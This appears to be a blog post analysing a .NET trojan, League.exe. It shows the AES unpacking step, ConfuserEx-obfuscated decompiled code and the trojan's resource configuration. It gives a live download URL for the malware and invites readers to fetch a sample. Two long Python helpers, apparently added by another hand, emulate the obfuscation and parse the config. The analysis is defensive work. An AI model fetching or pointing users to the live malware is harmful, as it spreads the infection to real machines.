league.exe trojan

By dose | February 22, 2018
Under: Uncategorized

I recently stumbled over an infected setup application from dubious sources on the internet on a victim’s machine. It contained a small obfuscated trojan which, interestingly, was written in .NET, so it was pretty easy to reverse engineer.
The trojan constantly downloads itself from http://ijwhite.com/white/League.exe, so you can download your own sample from there.

The trojan itself is encrypted with AES using a static key, which is very easy to unpack with a debugger like dnSpy. The code’s function names are obfuscated, so reading it doesn’t make much sense, but you just need to set a breakpoint before the unpacked .NET executable gets invoked and dump the decrypted memory buffer (held in the variable array) to disk, which can in turn be analyzed.

object obj = ze6WLzdqTLKVYk8yNb.qbpi2wrp4C09();
ze6WLzdqTLKVYk8yNb.Ssp0paUgqt("Key", obj, tqcF9712cQGgO);
ze6WLzdqTLKVYk8yNb.Ssp0paUgqt("IV", obj, tqcF9712cQGgO2);
object rXmEJKEg1Mp2m = ze6WLzdqTLKVYk8yNb.XYHLcqkA7W(obj);
array = ze6WLzdqTLKVYk8yNb.yGbemlFTZJdQjrX(rXmEJKEg1Mp2m, array);
object 6XaGtsti8u = ze6WLzdqTLKVYk8yNb.dXvj2MauvNk7t();

Now you get an executable file named stub, which in turn can be analyzed with dnSpy.
The executable is “obfuscated” with ConfuserEx v1.0.0.0.
This results in code that is difficult and annoying to read, like:

private static void Main(string[] args)
{
stub.res = stub.\u202D\u200D\u206B\u202C\u202B\u206D\u206E\u202A\u206C\u200E\u200F\u206D\u202B\u206E\u202B\u206A\u206F\u206C\u200B\u202E\u202E\u200D\u206E\u200D\u202E\u202B\u202A\u206D\u206E\u202B\u200C\u200E\u202B\u206F\u202E\u206E\u200D\u206D\u206A\u202E\u202E(<Module>.\u206D\u200B\u206B\u206C\u200D\u200E\u202E\u202E\u202B\u202A\u200D\u202C\u202A\u206A\u206B\u206B\u206A\u202C\u200C\u200F\u206F\u206E\u200E\u206C\u206C\u206B\u206F\u206B\u200F\u206E\u200D\u202E\u206B\u206D\u202C\u202C\u200C\u202D\u200D\u206A\u202E<string>(1666502779u), stub.\u202E\u202D\u200D\u200D\u206D\u206E\u206F\u206A\u202D\u206A\u200F\u202B\u202A\u206B\u200F\u206A\u202C\u206B\u206B\u200C\u206C\u206A\u202E\u200D\u202A\u206B\u200B\u206C\u206C\u206A\u200D\u200B\u206E\u200B\u200E\u202D\u200C\u200C\u206D\u202E\u202E());
for (;;)
{
IL_19:
uint num = 3253124917u;
for (;;)
{
uint num2;
switch ((num2 = (num ^ 2504117526u)) % 3u)
{
case 0u:
goto IL_19;
case 1u:
stub.\u202B\u200E\u206E\u206B\u206C\u202C\u206C\u206C\u200D\u202B\u202B\u200C\u206F\u206F\u206A\u200F\u206D\u200F\u200B\u200C\u206B\u202A\u200F\u206C\u206D\u200E\u206E\u206D\u206D\u200E\u202C\u202E\u206F\u206C\u206A\u200E\u206B\u206F\u206F\u202A\u202E(stub.\u200C\u206C\u206D\u206A\u202C\u200E\u206B\u200E\u202C\u202A\u200F\u202D\u206C\u200E\u200C\u200B\u206B\u202C\u202C\u200B\u200D\u206A\u200D\u200E\u202D\u200D\u202E\u202A\u206D\u206D\u200C\u202B\u200C\u206F\u200D\u206A\u202B\u200E\u206E\u202A\u202E(), new ResolveEventHandler(stub.CurrentDomain_AssemblyResolve));
num = (num2 * 307612828u ^ 2864558313u);
continue;
}
goto Block_1;
}
}
Block_1:
stub.Run(args);
}

Fortunately, there are tools out there for deobfuscating this Confuser stuff. Tools for doing so are linked here.
Afterwards, you get a pretty readable copy of the trojan.
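To see what the flattened switch in the decompiled Main() above really does, here is an added Python example (mine, not the post author's code and not part of any deobfuscation tool). It replays the state-machine arithmetic with C# uint32 wraparound and records which cases actually execute and in what order, which is the same constant evaluation a ConfuserEx deobfuscator performs on the IL. The numeric constants are copied from the listing above; the helper names and the case labels are my own.

```python
MASK = 0xFFFFFFFF  # C# uint arithmetic wraps at 32 bits

# Constants copied from the decompiled Main() above (ConfuserEx v1.0.0.0 output).
INITIAL_STATE = 3253124917   # uint num = 3253124917u;
DISPATCH_XOR = 2504117526    # num2 = num ^ 2504117526u
CASE_MODULUS = 3             # switch (num2 % 3u)
CASE1_MUL = 307612828        # num = (num2 * 307612828u ^ 2864558313u)
CASE1_XOR = 2864558313


def dispatch(num, dispatch_xor=DISPATCH_XOR, modulus=CASE_MODULUS):
    """Derive the per-iteration key `num2` and the switch case it selects."""
    num2 = (num ^ dispatch_xor) & MASK
    return num2, num2 % modulus


def step(num2, mul, xor):
    """Rewrite the state word the way a case body does: (num2 * mul ^ xor) in uint32."""
    return ((num2 * mul) & MASK) ^ xor


def replay(initial=INITIAL_STATE, transitions=None, restart_cases=(0,), max_steps=64):
    """Return the list of switch cases taken, in order, until the loop exits.

    `transitions` maps a case number to the (mul, xor) pair its body uses to
    rewrite `num` before `continue`. A case absent from the map is the
    decompiler's implicit default branch (`goto Block_1`), which leaves the
    loop. Cases in `restart_cases` jump back to IL_19 and re-seed `num`
    (unreachable with the sample's constants, but modelled so a hostile
    sample cannot spin the emulator forever).
    """
    if transitions is None:
        transitions = {1: (CASE1_MUL, CASE1_XOR)}
    trace = []
    num = initial
    for _ in range(max_steps):
        num2, case = dispatch(num)
        trace.append(case)
        if case in restart_cases:
            num = initial
            continue
        if case not in transitions:
            return trace          # default branch: goto Block_1 -> stub.Run(args)
        num = step(num2, *transitions[case])
    raise RuntimeError("state machine did not settle within max_steps; check the constants")


# Labels for this sample's cases, taken from what is visible in the decompiled code
# (the obfuscated method names are omitted).
LABELS = {
    1: "case 1: register new ResolveEventHandler(stub.CurrentDomain_AssemblyResolve)",
    2: "default: goto Block_1 -> stub.Run(args)",
}


def recovered_flow(trace):
    """Map a replayed case trace to readable descriptions."""
    return [LABELS.get(c, f"case {c}") for c in trace]


if __name__ == "__main__":
    for line in recovered_flow(replay()):
        print(line)
```

Run stand-alone, it reports that case 1 executes exactly once (the assembly-resolve handler is registered) and the second iteration lands on the default branch, so Main() is really just "hook AssemblyResolve, then stub.Run(args)". The `case 0` restart is never reached with these constants; it exists only to pad the switch. For a real method you lift the four constants per switch and rerun `replay`, which is exactly what the linked deobfuscation tools automate across the whole assembly.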

Judging from that, the trojan has multiple settings for injection, propagation, download, etc. Everything seems to be configurable via the resources section of the executable.
Looking at this specific trojan, it seems to be pretty dumb and just downloads itself over and over again. I suspect that the author may swap out the executable, possibly targeting different victim machines, by providing a copy of the trojan with a different configuration on a case-by-case basis, but this is just speculation.
Here is the resource section of the above-mentioned trojan:

// 0x0001BE74: STUB.resources (4868276 Bytes, Embedded, Public)

// 0x0001C75E: AdminRights = False
// 0x0001C760: AntiDump = False
// 0x0001C762: AntiSandboxie = False
// 0x0001C764: AttributeHidden = False
// 0x0001C766: AttributeSystem = False
// 0x0001C768: BinderItems = Object[][]-Array
// 0x00433FF9: CMDArgsFixed = ""
// 0x00433FFB: CMDArgsType = 0
// 0x00434000: CompressionGZIP = False
// 0x00434002: CompressionLZMA = False
// 0x00434004: CreationDateEnabled = False
// 0x00434006: CreationDateValue = 10.08.2016 17:36:12
// 0x0043400F: DisableCMD = False
// 0x00434011: DisableSafeMode = False
// 0x00434013: DisableSystemRestore = False
// 0x00434015: DisableTaskManager = False
// 0x00434017: DownloaderItems = Object[][]-Array: ["http://ijwhite.com/white/League.exe", "CommonApplicationData"]
// 0x00434039: InjectionType = 0
// 0x0043404E: MainFile = 567808 Bytes
// 0x004BEA53: MessageButton = 0
// 0x004BEA58: MessageEnabled = False
// 0x004BEA5A: MessageIcon = 0
// 0x004BEA5F: MessageOnlyOnce = False
// 0x004BEA61: MessageText = "Text"
// 0x004BEA67: MessageTitle = "Title"
// 0x0043403E: MUTEX = "TPfQHumqPQ5RUn"
// 0x004BEA6E: PersistenceStartup = False
// 0x004BEA70: PersistenceSystemWide = False
// 0x004BEA72: PersistenceWatchingProcess = False
// 0x004BEA74: ProcessKiller = String[]-Array
// 0x004BEA90: ProtectionAntiMemory = False
// 0x004BEA92: ProtectionBSOD = False
// 0x004BEA94: ProtectionDisableUAC = False
// 0x004BEA96: ProtectionElevatedProcess = False
// 0x004BEA98: RunPEDll = 5658 Bytes
// 0x004C00B7: StartupAdvanced = False
// 0x004C00B9: StartupEnabled = False
// 0x004C00BB: StartupFileName = "filename.exe"
// 0x004C00C9: StartupFolderName = ""
// 0x004C00CB: StartupForceRestart = False
// 0x004C00CD: StartupLocation = "Desktop"
// 0x004C00D6: StartupMelt = False
// 0x004C00D8: StartupName = "Update"
// 0x004C00E0: StartupTask = "...code for task XML file, removed for readability..."
// 0x004C0724: ZoneIDDelete = True
// 0x004C0726: ZoneIDEnabled = False
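The listing above is dnSpy's rendering of the resource section, not a file format, but the questions an analyst asks of it are always the same: which protections are switched on, which URLs the downloader is configured with, which embedded blobs carry payloads, and what the mutex name is (a cheap host-based indicator for this configuration). The following Python is an added example, mine rather than the post's or any tool's code: it parses an excerpt of the listing (the excerpt is constructed from those lines for this example) into a dictionary and summarises those points. The function names are my own.

```python
import re

# Constructed excerpt of the dnSpy resource listing above; field names, offsets
# and values are copied from it, the selection of lines is mine. One line keeps
# a stray U+200E mark, as the pasted listing does, to show it is tolerated.
SAMPLE_DUMP = """\
// 0x0001C75E: AdminRights\u200e = False
// 0x0001C768: BinderItems = Object[][]-Array
// 0x00434004: CreationDateEnabled = False
// 0x00434017: DownloaderItems = Object[][]-Array: ["http://ijwhite.com/white/League.exe", "CommonApplicationData"]
// 0x00434039: InjectionType = 0
// 0x0043404E: MainFile = 567808 Bytes
// 0x0043403E: MUTEX = "TPfQHumqPQ5RUn"
// 0x004BEA98: RunPEDll = 5658 Bytes
// 0x004C00D8: StartupName = "Update"
// 0x004C0724: ZoneIDDelete = True
// 0x004C0726: ZoneIDEnabled = False
"""

LINE_RE = re.compile(r"^//\s*0x([0-9A-Fa-f]+):\s*([\w.]+)\s*=\s*(.*)$")
LIST_RE = re.compile(r"\w+\[\]\[\]-Array:\s*\[(.*)\]")
BLOB_RE = re.compile(r"(\d+) Bytes")


def parse_value(raw):
    """Turn dnSpy's textual value into a Python value plus a kind tag."""
    raw = raw.strip()
    if raw in ("True", "False"):
        return raw == "True", "bool"
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return raw[1:-1], "str"
    m = BLOB_RE.fullmatch(raw)
    if m:
        return int(m.group(1)), "blob"      # embedded binary; only its size is shown
    if raw.isdigit():
        return int(raw), "int"
    m = LIST_RE.fullmatch(raw)
    if m:
        return re.findall(r'"([^"]*)"', m.group(1)), "list"
    return raw, "raw"                        # e.g. "String[]-Array" with no inline items


def parse_dump(text):
    """Map resource name -> {"offset", "value", "kind"} for every `name = value` line."""
    config = {}
    # Strip left-to-right marks that the pasted listing carries after each name.
    for line in text.replace("\u200e", "").splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        offset, name, raw = m.groups()
        value, kind = parse_value(raw)
        config[name] = {"offset": int(offset, 16), "value": value, "kind": kind}
    return config


def triage(config):
    """Summarise the settings an analyst wants to see first."""
    urls = []
    for entry in config.values():
        if entry["kind"] == "list":
            urls.extend(item for item in entry["value"]
                        if item.startswith(("http://", "https://")))
    return {
        "enabled_flags": sorted(n for n, e in config.items()
                                if e["kind"] == "bool" and e["value"]),
        "download_urls": urls,
        "embedded_blobs": {n: e["value"] for n, e in config.items() if e["kind"] == "blob"},
        "mutex": config.get("MUTEX", {}).get("value"),
    }


if __name__ == "__main__":
    for key, val in triage(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {val}")
```

On the full listing the summary is short and matches the author's reading: the only enabled flag is ZoneIDDelete, the single downloader entry points at the League.exe URL, and the two blobs (MainFile and RunPEDll) are the embedded payload and the injection helper. Unknown value shapes are kept as raw text rather than guessed at, so a differently configured copy of the same builder output still parses without silently dropping fields.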

If someone knows more about this trojan, please let me know.
